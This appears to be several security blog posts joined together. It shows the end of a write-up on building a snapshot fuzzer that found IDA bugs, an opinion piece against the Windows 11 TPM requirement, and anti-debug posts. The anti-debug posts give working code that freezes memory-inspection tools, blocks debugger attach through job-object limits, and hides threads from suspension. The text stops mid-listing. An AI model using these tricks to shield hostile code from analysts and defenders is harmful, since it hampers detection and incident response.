  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure.

I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}

On-demand paging

Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about 100$ / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

bounty.png

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

elf64.png

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

My talks @ BlackHat 2021 and DefCon29

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

Windows 11: TPMs and Digital Sovereignty

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

1
2
3
4
5
6
7
8
9
10
11
NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

1
2
3
4
5
6
7
8
/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

1
2
3
4
5
instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Fin

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Process on a diet: anti-debug using job objects

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

1
2
3
4
5
6
7
8
NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

1
2
3
4
5
6
7
8
9
10
HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

New year, new anti-debug: Don’t Thread On Me

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
1
2
3
4
5
6
7
8
